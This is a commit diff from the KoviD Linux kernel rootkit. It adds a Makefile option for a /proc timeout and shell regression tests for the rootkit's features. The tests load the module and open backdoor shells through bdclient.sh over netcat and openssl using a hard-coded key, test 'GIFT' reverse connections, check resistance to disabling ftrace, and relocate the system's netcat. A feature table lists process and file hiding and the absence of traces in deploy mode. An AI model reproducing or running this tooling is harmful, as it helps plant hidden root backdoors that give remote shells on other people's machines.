carloslack · carloslack · Dec 2, 2024 · Dec 2, 2024 · Dec 2, 2024 · Dec 2, 2024
diff --git a/Makefile b/Makefile
@@ -16,15 +16,17 @@ UUIDGEN := $(shell uuidgen)
 ifndef TEST_ENV
 BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
 UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
+PRCTIMEOUT := 1200
 else
 BDKEY=0x7d3b1cb572f16425
 UNHIDEKEY=0x2
+PRCTIMEOUT := 120
 endif
 
 # PROCNAME, /proc/<name> interface.
 COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \
-	-DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \
-	-DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=1200 \
+	-DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK \
+	-DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=$(PRCTIMEOUT) \
 	-DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\"
 
 EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}

diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
@@ -296,18 +296,24 @@ Here are information about testing of the features available.
 
 NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should contain `# REQUIRES: DEPLOY_ONLY` marker.
 
-| Feature                                            | Tested                         | Regression Test                       |
-| :--------------------------------------------------| :------------------------------| :------------------------------------ |
-| No tainted messages/log appear in DEPLOY           | Yes                            | cross/no-kovid-logs-in-deploy.test    |
-| kovid (DEPLOY) doesn't appear in /var /sys etc.    | Yes                            | cross/no-kovid-found.test             |
-| Hide/Unhide Module Test in DEBUG Mode              | Yes                            | cross/hide-unhide-module.test         |
-| Hide nc process                                    | Yes                            | complex/nc-hide-pid{_host}.test       |
-| nc backdoor                                        | Yes                            | native/nc-backdoor.test               |
-| openssl backdoor                                   | Yes                            | native/openssl-backdoor.test          |
-| tty backdoor                                       | Yes                            | native/tty-backdoor.test              |
-| backdoor echo -s                                   | Yes                            | native/nc-backdoor-echo-s.test        |
-| Hide/Unhide Module                                 | Yes                            | native/hide-unhide-module.test        |
-| backdoor + PID                                     | Yes                            | native/nc-backdoor-plus-pid.test      |
-| hide file                                          | Yes                            | native/hiden-file.test                |
-| hide file (2)                                      | Yes                            | native/hiden-file-in-all-dirs.test    |
-| unhide module                                      | Yes                            | native/hide-unhide-module.test        |
+| Feature                                            | Tested                         | Regression Test                                        |
+| :--------------------------------------------------| :------------------------------| :------------------------------------------------------|
+| No tainted messages/log appear in DEPLOY           | Yes                            | cross/no-kovid-logs-in-deploy.test                     |
+| kovid (DEPLOY) doesn't appear in /var /sys etc.    | Yes                            | cross/no-kovid-found.test                              |
+| Hide/Unhide Module Test in DEBUG Mode              | Yes                            | cross/hide-unhide-module.test                          |
+| Hide nc process                                    | Yes                            | complex/nc-hide-pid{_host}.test                        |
+| nc backdoor                                        | Yes                            | native/nc-backdoor.test                                |
+| openssl backdoor                                   | Yes                            | native/openssl-backdoor.test                           |
+| tty backdoor                                       | Yes                            | native/tty-backdoor.test                               |
+| backdoor echo -s                                   | Yes                            | native/nc-backdoor-echo-s.test                         |
+| Hide/Unhide Module                                 | Yes                            | native/hide-unhide-module.test                         |
+| backdoor + PID                                     | Yes                            | native/nc-backdoor-plus-pid.test                       |
+| hide file                                          | Yes                            | native/hiden-file.test                                 |
+| hide file (2)                                      | Yes                            | native/hiden-file-in-all-dirs.test                     |
+| unhide module                                      | Yes                            | native/hide-unhide-module.test                         |
+| procfile timeout                                   | Yes                            | native/proc-timeout.test                               |
+| Ftrace                                             | Yes                            | native/ftrace-disable-enable.test                      |
+| Remove netcat and install again (backdoors)        | Yes                            | native/nc-backdoor-remove-and-install-nc-tool.test     |
+| bdclient.sh test                                   | Yes                            | native/nc-backdoor-bdclient.test                       |
+| bdclient.sh GIFT                                   | Yes                            | test/native/gift-bdclient.test                         |
+| Kaudit                                             | Yes                            | test/native/kaudit.test                                |
diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test
@@ -0,0 +1,66 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+sudo insmod ../../../build/kovid.ko
+
+# Check initial value of ftrace_enabled
+INITIAL_VALUE=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Initial value of ftrace_enabled: $INITIAL_VALUE"
+
+# Attempt to disable ftrace by writing 0 to ftrace_enabled
+echo 0 > /proc/sys/kernel/ftrace_enabled
+READ_VALUE=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing 0: $READ_VALUE"
+
+# Verify kovid functionality using list-hidden-tasks
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
+echo list-hidden-tasks > /proc/myprocname
+echo "Kovid functionality with ftrace_enabled=0 is working."
+
+# Attempt another ftrace write with a different value (e.g., 2)
+echo 2 > /proc/sys/kernel/ftrace_enabled
+READ_VALUE2=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing 2: $READ_VALUE2"
+
+
+# Verify kovid functionality again using list-hidden-tasks
+echo list-hidden-tasks > /proc/myprocname
+echo "Kovid functionality with ftrace_enabled=2 is working."
+
+# Test echo with invalid values
+echo -1 > /proc/sys/kernel/ftrace_enabled
+READ_INVALID=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing -1: $READ_INVALID"
+
+# Cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Initial value of ftrace_enabled: 1
+# CHECK: Value of ftrace_enabled after writing 0: 1
+# CHECK: Kovid functionality with ftrace_enabled=0 is working.
+# CHECK: Value of ftrace_enabled after writing 2: 1
+# CHECK: Kovid functionality with ftrace_enabled=2 is working.
+# CHECK: Value of ftrace_enabled after writing -1: 1
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: Got event
+# CHECK: unloaded
+
+# FIXME: It should print
+# Value of ftrace_enabled after writing 2: 1
+# Value of ftrace_enabled after writing 0: 0
+# etc.
+# I have tried manually, as root, and it works.
+# I am not sure why `sudo su` did not make difference here.
diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test
@@ -0,0 +1,47 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Test parameters
+REMOTE_IP="127.0.0.1"  # Use localhost for the remote IP
+REMOTE_PORT="9999"
+BACKDOOR_KEY="0x7d3b1cb572f16425"
+GIFT_IP="127.0.0.1"  # Use localhost for GIFT
+
+# Test connection without GIFT
+echo "Testing connection without GIFT..."
+if GIFT="" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then
+    echo "Connection without GIFT succeeded."
+else
+    echo "ERROR: Connection without GIFT failed."
+fi
+
+# Test connection with GIFT
+echo "Testing connection with GIFT..."
+if GIFT="$GIFT_IP" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then
+    echo "Connection with GIFT succeeded."
+else
+    echo "ERROR: Connection with GIFT failed."
+fi
+
+# Cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection without GIFT succeeded.
+# CHECK: Connection with GIFT succeeded.
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: unloaded
diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
 

diff --git a/test/native/kaudit.test b/test/native/kaudit.test
@@ -0,0 +1,19 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+sudo insmod ../../../build/kovid.ko
+kill -CONT 999
+su
+exit
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: loaded.
+# CHECK: Cool! Now try 'su'
+# CHECK: Uninstalling: 'sys_exit_group' syscall=1
+# CHECK: unloaded.
diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test
@@ -0,0 +1,48 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s &> %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Define the number of connection attempts
+NUM_ATTEMPTS=5
+SUCCESS_COUNT=0
+FAIL_COUNT=0
+
+# Automate bdclient.sh for repeated connection and disconnection
+for i in $(seq 1 $NUM_ATTEMPTS); do
+    echo "Attempt $i: Establishing connection..."
+    if sudo timeout 5 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+        echo "Connection attempt $i succeeded."
+        SUCCESS_COUNT=$((SUCCESS_COUNT + 1))
+    else
+        echo "Connection attempt $i failed."
+        FAIL_COUNT=$((FAIL_COUNT + 1))
+    fi
+    # Wait briefly between attempts
+    sleep 1
+done
+
+# Remove the kernel module and cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: Got event
+# CHECK: unloaded
diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test
@@ -0,0 +1,50 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Prepare system by removing netcat (simulating backdoor tool removal)
+echo "Removing netcat..."
+sudo mv /usr/bin/nc /usr/bin/nc2 || echo "Netcat already removed."
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Attempt to establish a connection without netcat
+echo "Testing connection without netcat..."
+if ! sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+    echo "Connection failed as expected without netcat."
+else
+    echo "ERROR: Connection unexpectedly succeeded without netcat."
+fi
+
+# Restore netcat (simulating backdoor tool installation)
+echo "Restoring netcat..."
+sudo mv /usr/bin/nc2 /usr/bin/nc || echo "Netcat already restored."
+
+# Attempt to establish a connection with netcat restored
+echo "Testing connection with netcat restored..."
+if sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+    echo "Connection succeeded as expected with netcat restored."
+else
+    echo "ERROR: Connection unexpectedly failed with netcat restored."
+fi
+
+# Remove the kernel module and cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection failed as expected without netcat.
+# CHECK: /bin/sh: 0: can't access tty; job control turned off
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: Got event
+# CHECK: unloaded
diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test
@@ -0,0 +1,16 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sleep 10
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+sleep 140
+sudo dmesg
+sudo rmmod kovid
+
+# CHECK: /proc/myprocname loaded, timeout: 120s
+# CHECK: /proc/myprocname unloaded.